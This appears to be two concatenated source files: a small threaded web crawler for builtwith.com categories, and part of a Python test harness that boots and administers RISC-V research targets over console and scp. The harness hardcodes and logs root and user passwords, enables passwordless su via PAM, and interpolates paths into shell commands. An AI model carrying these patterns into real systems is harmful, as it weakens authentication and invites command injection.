import threading from queue import Queue from spider import Spider from domain import * from general import * ALL_OF_MY_CATEGORYS = read_file('category.txt') i = read_file('category.txt')[0] PROJECT_NAME = ALL_OF_MY_CATEGORYS[0].split('\n')[0] DOMAIN_NAME = get_domain_name('https://builtwith.com') QUEUE_FILE = PROJECT_NAME + '/queue.txt' CRAWLED_FILE = PROJECT_NAME + '/crawled.txt' NUMBER_OF_THREADS = 8 queue = Queue() queue1 = Queue() queue1 = file_to_set('category.txt') Spider(PROJECT_NAME, ALL_OF_MY_CATEGORYS[0].split('\n')[0], DOMAIN_NAME) queue1.remove(ALL_OF_MY_CATEGORYS[0].split('\n')[0]) set_to_file(queue1 , 'category.txt') # Create worker threads (will die when main exits) def create_workers(): for _ in range(NUMBER_OF_THREADS): t = threading.Thread(target=work) t.daemon = True t.start() # Do the next job in the queue def work(): while True: category = queue.get() Spider(category, category , DOMAIN_NAME) queue.task_done() # Each queued link is a new job def create_jobs(): for categoty in file_to_set('category.txt'): queue.put(categoty) queue.join() crawl() # Check if there are items in the queue, if so crawl them def crawl(): queue_categorys = file_to_set('category.txt') if len(queue_categorys)>0: print(str(len(queue_categorys)) + ' categorys left') create_jobs() create_workers() crawl()
common.py
#! /usr/bin/env python3 """ Main commonTarget class + misc common functions """ from besspin.base.utils.misc import * import os, sys, glob import pexpect, subprocess, threading import time, random, secrets, crypt import string, re import socket, errno, pty, termios, psutil from collections import Iterable from besspin.fett.unix import database from besspin.fett.unix import webserver from besspin.fett.unix import voting from besspin.fett.freertos import freertos from besspin.fett.unix import ssh class commonTarget(): def __init__(self, targetId=None): # target settings self.targetId = targetId self.targetIdInfo = f'<target{targetId}>: ' if (targetId) else '' self.targetSuffix = f'_{self.targetId}' if (self.targetId) else '' self.target = getSetting('target',targetId=self.targetId) if (self.target=='awsf1'): self.pvAWS = getSetting('pvAWS',targetId=self.targetId) self.targetInfo = (f"aws:{self.pvAWS}" if (self.target=='awsf1') else self.target) self.osImage = getSetting('osImage',targetId=self.targetId) self.processor = getSetting('processor',targetId=self.targetId) self.binarySource = getSetting('binarySource',targetId=self.targetId) self.sourceVariant = getSetting('sourceVariant',targetId=self.targetId) self.elfLoader = getSetting('elfLoader',targetId=self.targetId) self.procLevel = getSetting('procLevel',targetId=self.targetId) self.procFlavor = getSetting('procFlavor',targetId=self.targetId) self.xlen = getSetting('xlen',targetId=self.targetId) self.tarballName = getSetting('tarballName') self.process = None self.ttyProcess = None self.fTtyOut = None self.sshProcess = None self.fSshOut = None self.restartMode = False self.isSshRootEnabled = ((self.osImage=='FreeBSD') and (self.target=='vcu118')) # all OSes settings self.ipTarget = None self.ipHost = None self.portTarget = getSetting('commPortTarget') self.portHost = getSetting('commPortHost') # Unix settings self.inInteractMode = False self.stopShowingTime = None self.resendAttempts = 0 self.limitResendAttempts = 5 if ((self.osImage=='FreeBSD') and (self.target=='qemu')) else 3 # For ssh self.sshHostPort = None self.isSshConn = False self.sshRetries = 0 self.sshLimitRetries = 3 self.sshECDSAkeyWasUpdated = False self.onlySsh = ((self.osImage=='FreeBSD') and (self.target=='vcu118') and (self.binarySource=='GFE')) self.osHasBooted = False self.isCurrentUserRoot = True #This will be the indicator of which user we are logged in as. self.rootPassword = 'ssithdefault' if (self.osImage=='FreeBSD') else 'riscv' self.rootGroup = 'wheel' if (self.osImage=='FreeBSD') else 'root' self.userPassword = "besspin_2020" self.userName = (getSetting('userName') if isEnabled("useCustomCredentials") else "researcher") self.userCreated = False self.AttemptShutdownFailed = False self.keyboardInterruptTriggered = False self.terminateTargetStarted = False self.targetTearDownCalled = False self.appModules = [] if (getSetting('mode') in ['fettTest', 'fettProduction']): #Bugbounty app stack self.httpPortTarget = getSetting('HTTPPortTarget') self.httpsPortTarget = getSetting('HTTPSPortTarget') self.votingHttpPortTarget = getSetting('VotingHTTPPortTarget') self.votingHttpsPortTarget = getSetting('VotingHTTPSPortTarget') #Needed for findPort self.portsStep = 1 if (targetId is None) else getSetting('nTargets') portsShift = 0 if (targetId is None) else targetId-1 self.portsBegin = getSetting('portsRangeStart') + portsShift self.portsEnd = getSetting('portsRangeEnd') return @decorate.debugWrap def terminateAndExit (self,message,overrideShutdown=False,overrideConsole=False,exitCode=None,exc=None): if (self.stopShowingTime is not None): #turn off any time display try: self.stopShowingTime.set() except: pass errorAndLog(message,exc=exc) if (not overrideShutdown): self.shutdown(overrideConsole=overrideConsole,isError=True) self.tearDown() logAndExit("",exitCode=exitCode) @decorate.debugWrap @decorate.timeWrap def switchUser (self): if (not self.userCreated): warnAndLog("<switchUser> is called, but a user was never created.") self.createUser() if (self.osImage in ['debian', 'FreeBSD']): if (not self.isSshConn): isPrevUserRoot = self.isCurrentUserRoot self.isCurrentUserRoot = not self.isCurrentUserRoot self.runCommand ("exit",endsWith="login:") if (isPrevUserRoot): #switch to the other user loginName = self.userName loginPassword = self.userPassword else: #switch to root loginName = 'root' loginPassword = self.rootPassword self.runCommand (loginName,endsWith="Password:") if (self.osImage=='FreeBSD'): #Work around the occasional login failures maxLoginAttempts = 3 iAttempt = 0 loginSuccess = False while ((not loginSuccess) and (iAttempt < maxLoginAttempts)): # will timeout on error, not return Login failed retCommand = self.runCommand(loginPassword, endsWith=[self.getDefaultEndWith(),"\r\nlogin:"], timeout=60, suppressErrors=True, exitOnError=False, issueInterrupt=False) if retCommand[2]: printAndLog(f"{self.targetIdInfo}switchUser: Failed to login and received timeout. Trying again...",doPrint=False) # for some reason, needs to accept input to see the login failed string self.runCommand(" ",endsWith=["Login incorrect"],timeout=20) self.runCommand (loginName,endsWith="Password:") time.sleep(3) #wait for the OS to be ready for the password (maybe this works) iAttempt += 1 continue if (retCommand[3] == 0): loginSuccess = True elif (retCommand[3] == 1): # try again printAndLog(f"{self.targetIdInfo}switchUser: Failed to login. Trying again...",doPrint=False) self.runCommand (loginName,endsWith="Password:") time.sleep(3) #wait for the OS to be ready for the password (maybe this works) iAttempt += 1 else: printAndLog(f"{self.targetIdInfo}switchUser: Failed to login <iAttempt={iAttempt}>, and this part should never be executed!",doPrint=False) if (not loginSuccess): self.terminateAndExit(f"{self.targetIdInfo}switchUser: Failed to login ({maxLoginAttempts} times).",exitCode=EXIT.Run) else: self.runCommand (loginPassword) else: #open and close sshConnections self.closeSshConn() self.isCurrentUserRoot = not self.isCurrentUserRoot if (not self.isCurrentUserRoot): #switch to the other user sshSuccess = self.openSshConn(userName=self.userName) else: #switch to root sshSuccess = self.openSshConn(userName='root') if (not sshSuccess): self.terminateAndExit(f"switchUser: Failed to switch user.") elif (self.osImage=='busybox'): if (self.isCurrentUserRoot): #switch to the other user self.runCommand ("su {0}".format(self.userName),endsWith="\$") self.runCommand ("cd ~",endsWith="\$") else: #switch to root self.runCommand ("exit",endsWith="~ #") self.isCurrentUserRoot = not self.isCurrentUserRoot #<This needs to be figured out for busybox in case the login itself fails else: self.terminateAndExit(f"<switchUser> is not implemented on <{self.osImage}>.",exitCode=EXIT.Dev_Bug) return @decorate.debugWrap @decorate.timeWrap def shutdown (self,overrideConsole=False,isError=False): if (self.AttemptShutdownFailed): self.terminateAndExit(f"shutdown: Unable to shutdown the {self.target} properly.", overrideShutdown=True,exitCode=EXIT.Run) self.AttemptShutdownFailed = True #to avoid being trapped if the switching user failed and target is not responding if (isEnabled('openConsole') and (not overrideConsole)): if (self.isSshConn): #only interact on the JTAG self.closeSshConn() if (isEnabled('gdbDebug')): self.startGdbDebug() self.interact() if (isEnabled('gdbDebug')): self.endGdbDebug() if (self.userCreated): #Ensure self.isCurrentUserRoot is properly set #Check which user is logged in _,_,_,idxRet = self.runCommand(" ",endsWith=self.getAllEndsWith()) if (idxRet>=0): #success if (self.getAllEndsWith()[idxRet] != self.getDefaultEndWith()): #isCurrentUserRoot is wrong! self.isCurrentUserRoot = not self.isCurrentUserRoot else: #How would this happen? If an error happens, runCommand should call terminateAndExit and exit from there logAndExit("shutdown: Failed to find out which user is logged in in openConsole mode." " <This Error should never happen>",exitCode=EXIT.Dev_Bug) if (not self.isCurrentUserRoot): self.switchUser() self.terminateTarget() printAndLog (f"{self.targetIdInfo}{self.target} shut down successfully!", doPrint=not (isEqSetting('mode', 'evaluateSecurityTests') and (self.osImage=='FreeRTOS'))) return @decorate.debugWrap def parseBootTimeoutDict (self,bootTimeoutDict,key="boot"): try: return bootTimeoutDict[key] except Exception as exc: logAndExit (f"Failed to extract the timeout value for <{key}> from the timeout dict.",exc=exc,exitCode=EXIT.Dev_Bug) @decorate.debugWrap def get_timeout_from_settings_dict(self,osImage): def traverse_data(layer): if 'timeout' in layer: return True, layer['timeout'], None elif 'name' in layer: name = layer['name'] if (name in ["cross-compiler"]): #A list of non-target settings in bootTimeout.json setting = getSetting(name) else: setting = getSetting(name,targetId=self.targetId) if setting in layer: return traverse_data(layer[setting]) elif 'else' in layer: return traverse_data(layer['else']) else: return False, 0, { 'message': f'Unrecognized value <{setting}> for setting <{name}> in <bootTimeout.json>.', 'overrideShutdown': True, 'exitCode': EXIT.Dev_Bug } else: return False, 0, { 'message': f'Unrecognized layer <{layer}> in <bootTimeout.json>.', 'overrideShutdown': True, 'exitCode': EXIT.Dev_Bug } data = safeLoadJsonFile(os.path.join(getSetting('repoDir'), 'besspin', 'target', 'utils', 'bootTimeout.json')) if (osImage not in data): return False, 0, { 'message': f'start: Timeout is not recorded for osImage=<{osImage}>.', 'overrideShutdown': True, 'exitCode': EXIT.Implementation } os_image = data[osImage] if (osImage in ['busybox', 'FreeRTOS']): #special case return traverse_data(os_image) elif self.target not in os_image: return False, 0, { 'message': f'start: Timeout is not recorded for target=<{self.target}>.', 'overrideShutdown': True, 'exitCode': EXIT.Implementation } target = os_image[self.target] return traverse_data(target) @decorate.debugWrap @decorate.timeWrap def start (self): if (isEqSetting("mode","evaluateSecurityTests") and (not isEnabled("isThereAReasonToBoot"))): return #there is no reason to boot success, timeoutDict, message = self.get_timeout_from_settings_dict(self.osImage) if not success: self.terminateAndExit(**message) if self.osImage in ['debian', 'busybox', 'FreeBSD']: if (self.restartMode and (self.target=='awsf1')): for timeout in timeoutDict.keys(): timeoutDict[timeout] += 120 #takes longer to restart printAndLog(f"{self.targetIdInfo}start: Booting <{self.osImage}> on " f"<{self.target}>. This might take a while...") self.sumTimeout = sum(timeoutDict.values()) if (self.osImage=='debian'): if (not isEqSetting('mode','cyberPhys')): self.stopShowingTime = showElapsedTime (getSetting('trash'),estimatedTime=self.sumTimeout,stdout=sys.stdout) self.boot(endsWith="login:",timeoutDict=timeoutDict) if (not isEqSetting('mode','cyberPhys')): self.stopShowingTime.set() time.sleep (0.3) #to make it beautiful #logging in printAndLog (f"{self.targetIdInfo}start: Logging in, activating ethernet, and setting system time...",doPrint=(not self.targetId)) self.runCommand ("root",endsWith="Password:",overrideShutdown=True) loginTimeout = 120 if (self.restartMode and (self.target=='awsf1')) else 60 self.runCommand (self.rootPassword,timeout=loginTimeout,overrideShutdown=True) elif (self.osImage=='busybox'): if (not isEqSetting('mode','cyberPhys')): self.stopShowingTime = showElapsedTime (getSetting('trash'),estimatedTime=self.sumTimeout,stdout=sys.stdout) self.boot(endsWith="Please press Enter to activate this console.",timeoutDict=timeoutDict) if (not isEqSetting('mode','cyberPhys')): self.stopShowingTime.set() time.sleep (0.3) #to make it beautiful self.runCommand (" ",endsWith="/ #",timeout=10,overrideShutdown=True) #This is necessary self.runCommand("cd root",timeout=10) printAndLog (f"{self.targetIdInfo}start: Logging in, activating ethernet, and setting system time...",doPrint=(not self.targetId)) elif (self.osImage=='FreeRTOS'): if (self.binarySource=='Michigan'): startMsg = 'INFO: Open database successfully' else: startMsg = '>>>Beginning of Besspin<<<' self.boot (endsWith=startMsg,timeoutDict=timeoutDict) elif (self.osImage=='FreeBSD'): if (not isEqSetting('mode','cyberPhys')): self.stopShowingTime = showElapsedTime (getSetting('trash'),estimatedTime=self.sumTimeout,stdout=sys.stdout) bootEndsWith = "login:" self.boot(endsWith=bootEndsWith, timeoutDict=timeoutDict) if (not isEqSetting('mode','cyberPhys')): self.stopShowingTime.set() time.sleep (0.3) #to make it beautiful # set the temporary prompt if ((self.binarySource=="SRI-Cambridge") or ((self.binarySource=="GFE") and (self.target=='awsf1') and (self.pvAWS=="connectal"))): tempPrompt = "~ #" else: tempPrompt = "\r\n#" # vcu118 freebsd would be already logged in if onlySsh if (self.target=='qemu'): self.runCommand ("root",endsWith=tempPrompt,overrideShutdown=True) self.runCommand (f"echo \"{self.rootPassword}\" | pw usermod root -h 0",erroneousContents="pw:",endsWith=tempPrompt) elif (not self.onlySsh): if ((self.binarySource!="SRI-Cambridge") or (self.restartMode and (self.target=='awsf1'))): self.runCommand ("root",endsWith='Password:',overrideShutdown=True) self.runCommand (self.rootPassword,endsWith=tempPrompt,overrideShutdown=True) else: self.runCommand ("root",endsWith=tempPrompt,overrideShutdown=True) if (self.target!='awsf1'): self.runCommand("echo \"besspinPrompt> \" > promptText.txt",endsWith=tempPrompt) #this is to avoid having the prompt in the set prompt command self.runCommand(f"echo \'set prompt = \"besspinPrompt> \"\' > .cshrc",endsWith=tempPrompt) self.runCommand("set prompt = \"`cat promptText.txt`\"") self.runCommand("rm promptText.txt") printAndLog (f"{self.targetIdInfo}start: Activating ethernet and setting system time...",doPrint=(not self.targetId)) # Register that the OS has booted self.osHasBooted = True if (isEqSetting('mode', 'evaluateSecurityTests') and (self.osImage=='FreeRTOS')): printAndLog(f"{self.targetIdInfo}start: {self.osImage} booted successfully!", doPrint=False) # Return early to save time by avoiding unnecessary setup return #up the ethernet adaptor and get the ip address if (not ((self.osImage=='FreeRTOS') and (self.target=='qemu'))): #network is not supported on FreeRTOS qemu self.activateEthernet() if (self.restartMode and (self.target=='awsf1')): #skip the reset of start() in awsf1 mode if (self.osImage=='debian'): # timesync is not in the boot sequence of neither GFE nor MIT images ntpTimeout = 150 if (self.binarySource=='MIT') else 60 # MIT needs some more time to be responsive self.runCommand("systemctl start systemd-timesyncd.service",timeout=ntpTimeout) printAndLog (f"{self.targetIdInfo}start: {self.osImage} booted _again_ successfully!") return #fixing the time is important to avoid all time stamp warnings, and because it messes with Makefile. awsNtpServer = "169.254.169.123" if (self.osImage=='debian'): if (self.target=='awsf1'): # Use AWS NTP server self.runCommand(f"echo 'NTP={awsNtpServer}' >> " "/etc/systemd/timesyncd.conf") else: self.runCommand("echo \"nameserver 1.1.1.1\" > /etc/resolv.conf") self.runCommand("systemctl start systemd-timesyncd.service") if not self.hasHardwareRNG(): #get the ssh up and running if (self.procLevel=='p3'): time.sleep(5) #need some time to recover before being able to sendFile self.sendFile(getSetting('buildDir',targetId=self.targetId),'addEntropyDebian.riscv') self.runCommand("chmod +x addEntropyDebian.riscv") self.ensureCrngIsUp () #check we have enough entropy for ssh if ((self.processor=='bluespec_p3') and isEqSetting('mode','evaluateSecurityTests')): self.openSshConn() elif (self.osImage=='FreeBSD'): if (self.target=='awsf1'): # Delete default NTP pool self.runCommand('sed -i "" "/^pool/d" /etc/ntp.conf') # Add AWS NTP server self.runCommand(f"echo 'server {awsNtpServer} iburst' >> " "/etc/ntp.conf") else: self.runCommand("echo \"nameserver 1.1.1.1\" > /etc/resolv.conf") # Add ntpd to rc.conf and start it self.runCommand("echo 'ntpd_enable=\"YES\"' >> /etc/rc.conf") self.runCommand("echo 'ntpd_sync_on_start=\"YES\"' >> /etc/rc.conf") self.runCommand("service ntpd start",timeout=120 if (self.procLevel=='p3') else 60) # Instruct the kernel debugger to restart instead of debugging mode when the kernel panics if ((self.binarySource=="SRI-Cambridge") and (self.osImage=='FreeBSD') and (self.target=='awsf1')): self.runCommand("sysctl debug.debugger_on_panic=0") self.runCommand('echo "debug.debugger_on_panic=0" >> /etc/sysctl.conf') # disable core dump for FreeBSD targets if ((self.osImage=='FreeBSD') and isEqSetting('mode','evaluateSecurityTests')): self.runCommand("sysctl kern.coredump=0") if self.osImage in ['debian', 'FreeBSD'] and ((self.binarySource!="SRI-Cambridge")): printAndLog(f"{self.targetIdInfo}start: setting motd...",doPrint=(not self.targetId)) motdPath = '/etc/motd.template' if (self.osImage=='FreeBSD') else '/etc/motd' instanceType = f"{self.binarySource} / {self.osImage} / {self.processor}" self.runCommand(f"printf '\\nInstance type: {instanceType}\\n\\n' > {motdPath}") if (self.osImage=='FreeBSD'): self.runCommand("service motd restart") printAndLog (f"{self.targetIdInfo}start: {self.osImage} booted successfully!") return @decorate.debugWrap def interact(self): #This method gives the control back to the user if (self.inInteractMode): return #avoid recursive interact mode self.inInteractMode = True if (self.userCreated): if isEnabled("useCustomCredentials"): printAndLog(f"Note that there is another user. User name: \'{self.userName}\'.") if (not isEnabled('gdbDebug')): # Log out to prompt user to log in using their credentials. # We can't log in for them because we only have the hash of # their password output = self.runCommand("exit", endsWith="login:")[1] printAndLog("Please log in using the credentials you supplied") # Print login prompt from OS. Drop the first 2 lines because # those contain the exit / logout messages from running the # `exit` command print("\n".join(output.split("\n")[2:]), end="") else: printAndLog (f"Note that there is another user. User name: \'{self.userName}\'. Password: \'{self.userPassword}\'.") printAndLog ("Now the shell is logged in as: \'{0}\'.".format('root' if self.isCurrentUserRoot else self.userName)) try: self.process.interact(escape_character='\x05') #escaping interact closes the logFile, which will make any read/write fail inside pexpect logging self.fTtyOut = ftOpenFile(self.fTtyOut.name,self.fTtyOut.mode) except Exception as exc: errorAndLog(f"Failed to open interactive mode.",exc=exc) @decorate.debugWrap @decorate.timeWrap def changeRootPassword(self): printAndLog(f"{self.targetIdInfo}Changing the root password...", doPrint=False) alphabet = string.ascii_letters + string.digits + "!@#$%^&*(-_=+)" self.rootPassword = ''.join(secrets.choice(alphabet) for i in range(14)) if (self.osImage=='debian'): self.runCommand(f"passwd root", endsWith="New password:") self.runCommand(self.rootPassword, endsWith="Retype new password:") self.runCommand(self.rootPassword, expectedContents='password updated successfully') elif (self.osImage=='FreeBSD'): userPasswordHash = sha512_crypt(self.rootPassword) command = (f"echo \'{userPasswordHash}\' | " f"pw usermod root -H 0") self.runCommand(command, erroneousContents="pw:") else: self.terminateAndExit( f"<update root password> is not implemented for <{self.osImage}> on <{self.target}>.", exitCode=EXIT.Implementation) printAndLog(f"{self.targetIdInfo}root password has been changed successfully to <{self.rootPassword}>.") @decorate.debugWrap @decorate.timeWrap def enableRootUserAccess(self): """ Enable passwordless `su` for users in the `wheel` group and add the user to `wheel`. """ printAndLog(f"{self.targetIdInfo}Enabling root user access...",doPrint=(not self.targetId)) if (self.osImage=='debian'): self.runCommand('sed -i "s/# auth sufficient pam_wheel.so trust/auth sufficient pam_wheel.so trust/" ' '/etc/pam.d/su') self.runCommand("groupadd wheel") self.runCommand(f"usermod -aG wheel {self.userName}") elif (self.osImage=='FreeBSD'): self.runCommand('sed -i "" "s/auth\\t\\trequisite\\tpam_group.so/' 'auth\\t\\tsufficient\\tpam_group.so/" ' '/etc/pam.d/su') self.runCommand(f"pw group mod wheel -m {self.userName}") else: self.terminateAndExit("<enableRootUserAccess> is not implemented " f"for <{self.osImage}>.", overrideConsole=True, exitCode=EXIT.Implementation) @decorate.debugWrap @decorate.timeWrap def createUser (self): printAndLog (f"{self.targetIdInfo}Creating a user...",doPrint=(not self.targetId)) if (self.osImage=='debian'): self.runCommand (f"useradd -m {self.userName} && echo \"{self.userName}:{self.userPassword}\" | chpasswd") self.runCommand (f"usermod --shell /bin/bash {self.userName}") self.runCommand(f"echo \"PS1=\'\${{debian_chroot:+(\$debian_chroot)}}\\u@\\h:\\w\$ \'\" >> /home/{self.userName}/.bashrc") elif (self.osImage=='FreeBSD'): self.runCommand (f"echo \"{self.userName}::::::{self.userName}::sh:{self.userPassword}\" | adduser -f -",expectedContents=f"Successfully added ({self.userName}) to the user database.",timeout=90) elif (self.osImage=='busybox'): self.runCommand ("mkdir -p /home/{0}".format(self.userName)) self.runCommand ("adduser {0}".format(self.userName),endsWith="New password:",expectedContents='Changing password') self.runCommand (self.userPassword,endsWith="Retype password:") self.runCommand (self.userPassword,expectedContents='changed by root') else: self.terminateAndExit(f"<createUser> is not implemented for <{self.osImage}> on <{self.target}>.",overrideConsole=True,exitCode=EXIT.Implementation) self.userCreated = True printAndLog (f"{self.targetIdInfo}User created!",doPrint=(not self.targetId)) @decorate.debugWrap @decorate.timeWrap def changeUserPassword(self): """ Change the user's password hash to userPasswordHash from the configuration file. Precondition: useCustomCredentials must be True in the configuration file Precondition: User must have already been created """ if not isEnabled("useCustomCredentials"): self.terminateAndExit("<changeUserPassword> cannot be called if " "<useCustomCredentials> is False.", exitCode=EXIT.Dev_Bug) if not self.userCreated: self.terminateAndExit("<changeUserPassword> cannot be called if " "user has not been created.", exitCode=EXIT.Dev_Bug) if not self.isCurrentUserRoot: self.switchUser() printAndLog(f"{self.targetIdInfo}Changing user {self.userName}'s password",doPrint=(not self.targetId)) userPasswordHash = getSetting("userPasswordHash") if (self.osImage=='debian'): command = f"usermod -p \'{userPasswordHash}\' {self.userName}" res = self.runCommand(command) elif (self.osImage=='FreeBSD'): command = (f"echo \'{userPasswordHash}\' | " f"pw usermod {self.userName} -H 0") self.runCommand(command, erroneousContents="pw:") else: self.terminateAndExit("<createUser> is not implemented for " f"<{self.osImage}> on " f"<{self.target}>.", overrideConsole=True, exitCode=EXIT.Implementation) @decorate.debugWrap def getDefaultEndWith (self,userName=None): if (not self.userCreated): isRoot = True elif (userName is None): isRoot = self.isCurrentUserRoot else: isRoot = (userName != self.userName) if (self.osImage=='debian'): if (isRoot): return ":~#" else: return ":~\$" elif (self.osImage=='FreeBSD'): if (isRoot): if (self.target=='awsf1'): return ":~ #" else: return "besspinPrompt>" else: return ":~ \$" elif (self.osImage=='busybox'): if (isRoot): return "~ #" else: return "\$" else: self.terminateAndExit(f"<getDefaultEndWith> is not implemented for <{self.osImage}>.",exitCode=EXIT.Implementation) @decorate.debugWrap def getAllEndsWith (self): if (self.osImage=='debian'): return [":~#", ":~\$"] elif (self.osImage=='FreeBSD'): if (self.target=='awsf1'): return [":~ #", ":~ \$"] else: return ["besspinPrompt>", ":~ \$"] elif (self.osImage=='busybox'): return ["~ #", "\$"] else: self.terminateAndExit(f"<getAllEndsWith> is not implemented for <{self.osImage}>.",exitCode=EXIT.Implementation) @decorate.debugWrap @decorate.timeWrap def runCommand (self,command,endsWith=None,expectedContents=None, erroneousContents=None,exitOnError=True,timeout=60,overrideShutdown=False, suppressErrors=False,tee=None,sendToNonUnix=False,issueInterrupt=True,process=None): """ " runCommand: Sends `command` to the target, and wait for a reply. " ARGUMENTS: " ---------- " command: The string to send to target using `sendToTarget`. If FreeRTOS, we do nothing with it. " endsWith: String/regex or list of strings/regex. The function returns when either is received from target. " expectedContents: string or list of strings. If either is not found in the target's response --> error " erroneousContents: string or list of strings. If either is found in the target's response --> error " exitOnError: Boolean. Whether to return or terminateAndExit in case of error (timeout or contents related error) " timeout: how long to wait for endsWith before timing out. " overrideShutdown: Boolean. Whether to skip "shutdown" when terminating. (Should be used before the target is fully booted) " Note that disabling "exitOnError" renders this redundant. " suppressErrors: Boolean. Whether to print the errors on screen, or just report it silently. " tee: A file object to write the text output to. Has to be a valid file object to write. " sendToNonUnix: Boolean. If enabled, the command is sent to non-Unix targets as well. " issueInterrupt: use keyboardInterrupt to resolve timeout recovery " process: runCommand with a different process than self.process " RETURNS: " -------- " A list: [isSuccess : "Boolean. True on no-errors.", " textBack : "A string containing all text returned back from the target after sending the command.", " wasTimeout : "Boolean. True if timed-out waiting for endsWith.", " idxEndsWith: The index of the endsWith received. If endsWith was a string, this would be 0. -1 on time-out. """ process = self.process if process is None else process if (self.processor=='bluespec_p3'): timeout += 60 if (isEnabled('isUnix',targetId=self.targetId) or sendToNonUnix): self.sendToTarget (command,exitOnError=exitOnError,process=process) if (endsWith is None): endsWith = self.getDefaultEndWith() textBack, wasTimeout, idxEndsWith = self.expectFromTarget (endsWith,command,exitOnError=exitOnError, overrideShutdown=overrideShutdown, timeout=timeout,issueInterrupt=issueInterrupt, process=process,suppressWarnings=suppressErrors) logging.debug(f"runCommand: After expectFromTarget: <command={command}>, <endsWith={endsWith}>") logging.debug(f"wasTimeout={wasTimeout}, idxEndsWith={idxEndsWith}") logging.debug(f"textBack:\n{textBack}") isSuccess = not wasTimeout if (expectedContents is not None): if (isinstance(expectedContents,str)): #only one string expectedContents = [expectedContents] for content in expectedContents: if (content not in textBack): isSuccess = False errorAndLog (f"runCommand: Missing <{content}> while executing <{command}>.",doPrint=not suppressErrors) break #One error per command is enough if (erroneousContents is not None): if (isinstance(erroneousContents,str)): #only one string erroneousContents = [erroneousContents] for content in erroneousContents: if (content in textBack): isSuccess = False errorAndLog (f"runCommand: Encountered <{content}> while executing <{command}>.",doPrint=not suppressErrors) break #One error per command is enough if (tee): try: tee.write(textBack) except Exception as exc: isSuccess = False try: fName = tee.name except: fName = 'UNKNOWN_FILE' errorAndLog (f"runCommand: Failed to tee the output to <{fName}> while executing <{command}>.",doPrint=not suppressErrors,exc=exc) if (exitOnError and not isSuccess): self.terminateAndExit(f"runCommand: fatal error.",exitCode=EXIT.Run) return [isSuccess, textBack, wasTimeout, idxEndsWith] #the 3rd argument is "timed-out" # Send a between host and target. # xFile : file to send # pathToFile : directory containing xFile on host # targetPathToFile : directory containing xFile on target # toTarget : direction of send. # True[default] = send from host to target # False = send from target to host. Requires an SSH connection. @decorate.debugWrap @decorate.timeWrap def sendFile (self,pathToFile,xFile,targetPathToFile=None,toTarget=True,forceScp=False,timeout=30,exitOnError=True): #send File to target if (not isEnabled('isUnix',targetId=self.targetId)): self.terminateAndExit(f"<sendFile> is not implemented for <{self.osImage}> on <{self.target}>.",exitCode=EXIT.Implementation) def returnFalse (message='',noRetries=False,exc=None,fileToClose=None): if not (self.osImage in ['debian', 'FreeBSD'] and (forceScp or self.isSshConn)): self.keyboardInterrupt () if (exc): logging.error(traceback.format_exc()) if ((not noRetries) and (self.resendAttempts < self.limitResendAttempts-1)): logging.error(message) errorAndLog (f"sendFile: Failed to send <{pathToFile}/{xFile}> to target. Trying again...") self.resendAttempts += 1 return self.sendFile (pathToFile,xFile,targetPathToFile=targetPathToFile,toTarget=toTarget,timeout=timeout,exitOnError=exitOnError,forceScp=forceScp) elif (exitOnError): self.terminateAndExit (message + f"\nsendFile: Failed to send <{pathToFile}/{xFile}> to target.",exitCode=EXIT.Run) else: logging.error(message) errorAndLog (f"sendFile: Failed to send <{pathToFile}/{xFile}> to target.") return False if ( (self.ipTarget is None) or (self.portTarget is None) or (self.portHost is None) ): return returnFalse ("Ethernet not properly activated. <sendFile> can not execute.",noRetries=True) def checksumHost(f): #find the sha256sum of the file shaSumTX = str(subprocess.check_output (f"sha256sum {f} | awk '{{ print $1 }}'",stderr=subprocess.STDOUT,shell=True),'utf-8').strip() logging.debug(f"Output from <sha256sum>:\n{shaSumTX}") return shaSumTX def checksumTarget(f): shaSumRX = None if (self.osImage=='debian'): timeoutSha = 180 if (self.processor=='bluespec_p3') else 120 retShaRX = self.runCommand(f"sha256sum {f}",timeout=timeoutSha)[1] elif (self.osImage=='FreeBSD'): retShaRX = self.runCommand(f"sha256 {f}",timeout=120)[1] retShaRX += self.runCommand(" ")[1] logging.debug(f"retShaRX:\n{retShaRX}") for line in retShaRX.splitlines(): if (self.osImage=='debian'): shaMatch = re.match(rf"^(?P<shaSum>[0-9a-f]+)\s+ {f}\s*$",line) elif (self.osImage=='FreeBSD'): shaMatch = re.match(rf"^SHA256 \({f}\) = (?P<shaSum>[0-9a-f]+)$",line) if (shaMatch is not None): shaSumRX = shaMatch.group('shaSum') break if (shaSumRX is None): raise return shaSumRX # The path to the file on the target currentUser = 'root' if self.isCurrentUserRoot else self.userName user_path = 'root' if self.isCurrentUserRoot else 'home/' + self.userName targetPathRoot = f"/{user_path}" if targetPathToFile is None else targetPathToFile targetPath = os.path.join(targetPathRoot,xFile) # The path to the file on the host hostPath = os.path.join(pathToFile,xFile) try: f = hostPath if toTarget else targetPath shaSumTX = checksumHost(f) if toTarget else checksumTarget(f) except Exception as exc: return returnFalse (f"Failed to obtain the checksum of <{f}>.",noRetries=True,exc=exc) if (self.osImage in ['debian', 'FreeBSD'] and (forceScp or self.isSshConn)): #send through SSH if (currentUser == 'root'): self.enableSshOnRoot() portPart = '' if (not self.sshHostPort) else f" -P {self.sshHostPort}" # if sending TO target, then "scp host target" otherwise flipped scpTargetPath = f"{currentUser}@{self.ipTarget}:{targetPath}" scpArgs = f"{hostPath} {scpTargetPath}" if toTarget else f"{scpTargetPath} {hostPath}" scpCommand = f"env -u SSH_AUTH_SOCK scp{portPart} {scpArgs}" passwordPrompt = [f"Password for {currentUser}@[\w-]+\:",f"{currentUser}@[\w\-\.]+\'s password\:","\)\?"] scpOutFile = ftOpenFile(os.path.join(getSetting('workDir'),f'scp{self.targetSuffix}.out'),'a') if (not self.sshECDSAkeyWasUpdated): self.clearHostKey() try: scpProcess = pexpect.spawn(scpCommand,encoding='utf-8',logfile=scpOutFile,timeout=15) except Exception as exc: return returnFalse (f"Failed to spawn an scp process for sendFile.",exc=exc) self.genStdinEntropy(endsWith=self.getAllEndsWith()) #get some entropy going on try: retExpect = scpProcess.expect(passwordPrompt + ["\)\?"],timeout=30) except Exception as exc: return returnFalse (f"Unexpected outcome from the scp command.",exc=exc) try: if (retExpect == 2): #needs a yes scpProcess.sendline("yes") retExpect = scpProcess.expect(passwordPrompt,timeout=15) if (retExpect in [0,1]): #password prompt pwd = self.rootPassword if self.isCurrentUserRoot else self.userPassword scpProcess.sendline(pwd) else: return returnFalse (f"Failed to authenticate the scp process.") except Exception as exc: return returnFalse (f"Unexpected error while using the scp command [sending password].",exc=exc) try: scpProcess.expect(pexpect.EOF,timeout=timeout) except Exception as exc: return returnFalse (f"Unexpected error while using scp command [waiting for 